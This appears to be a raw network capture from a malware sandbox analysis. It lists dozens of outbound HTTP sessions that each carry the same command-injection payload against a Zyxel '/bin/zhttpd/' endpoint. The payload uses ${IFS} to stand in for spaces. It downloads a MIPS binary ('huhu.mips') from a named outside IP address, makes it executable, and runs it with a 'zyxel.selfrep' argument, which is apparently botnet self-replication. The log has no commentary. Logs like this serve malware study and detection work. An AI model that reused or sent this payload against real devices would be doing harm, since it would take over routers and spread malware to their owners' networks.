                                              Jan 29, 2024 07:03:48.980051994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4039192.168.2.1453064194.133.47.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980051041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4040192.168.2.143998059.168.1.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980091095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4041192.168.2.1436236213.249.106.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980144978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4042192.168.2.1449850128.110.139.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980207920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4043192.168.2.1443140105.84.202.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980237007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4044192.168.2.1452020109.89.123.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980295897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4045192.168.2.1434092210.142.28.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980336905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4046192.168.2.1439768103.69.151.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980365992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4047192.168.2.1456518189.163.137.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980396986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4048192.168.2.1441956147.0.174.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980417967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4049192.168.2.1456416199.148.237.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980448008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4050192.168.2.1441588213.97.235.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980514050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4051192.168.2.145138051.219.215.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980549097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4052192.168.2.1439120120.220.38.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980572939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4053192.168.2.144034839.213.61.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980627060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4054192.168.2.144054065.219.36.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980653048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4055192.168.2.1442954103.174.171.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980691910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4056192.168.2.145324687.191.55.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980724096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4057192.168.2.144422894.231.249.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980762959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4058192.168.2.143696498.188.244.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980798006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4059192.168.2.1446622220.163.144.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980859041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4060192.168.2.14517485.36.217.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980911016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4061192.168.2.143291063.218.45.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980948925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4062192.168.2.1456058189.68.97.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980978012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4063192.168.2.1443822146.186.196.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981029987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4064192.168.2.1435564185.169.183.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981057882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4065192.168.2.1440336137.243.93.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981116056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4066192.168.2.143610667.247.89.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981178045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4067192.168.2.143803457.98.102.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981203079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4068192.168.2.1448908183.184.82.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981209993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4069192.168.2.1455150111.139.103.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981255054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4070192.168.2.1457362187.152.229.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981309891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4071192.168.2.144514031.151.62.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981342077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4072192.168.2.14393089.113.174.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981386900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4073192.168.2.1454922196.156.29.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981421947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4074192.168.2.143452638.251.65.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981450081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4075192.168.2.143602217.40.223.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981488943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4076192.168.2.1458958212.187.227.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981513977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4077192.168.2.145920474.172.198.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981573105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4078192.168.2.1449090146.203.81.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981604099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4079192.168.2.144943877.169.157.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981637001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4080192.168.2.1440726149.139.1.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981673002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4081192.168.2.145416446.222.102.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981726885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4082192.168.2.1445998192.46.85.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981746912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4083192.168.2.143771847.1.246.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981772900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4084192.168.2.145776878.234.93.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981813908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4085192.168.2.143383696.166.74.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981853008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4086192.168.2.144908467.145.11.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981899023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4087192.168.2.1441830108.237.102.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981929064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4088192.168.2.1435550126.52.37.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.981961012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4089192.168.2.1436908195.43.169.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982014894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4090192.168.2.1440500195.251.241.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982034922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4091192.168.2.1453514183.47.237.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982070923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4092192.168.2.1439830114.7.244.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982093096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4093192.168.2.1448114158.2.249.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982119083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4094192.168.2.1456906164.25.166.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982161045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4095192.168.2.143350897.178.234.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982196093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4096192.168.2.146097882.111.245.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982248068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4097192.168.2.1459104102.129.121.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982274055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4098192.168.2.1453046146.176.90.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982309103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4099192.168.2.1455512103.76.101.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982338905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4100192.168.2.143355692.67.89.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982379913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4101192.168.2.1457508221.211.132.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982419968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4102192.168.2.143493251.152.208.55443
                                              TimestampBytes transferredDirectionData
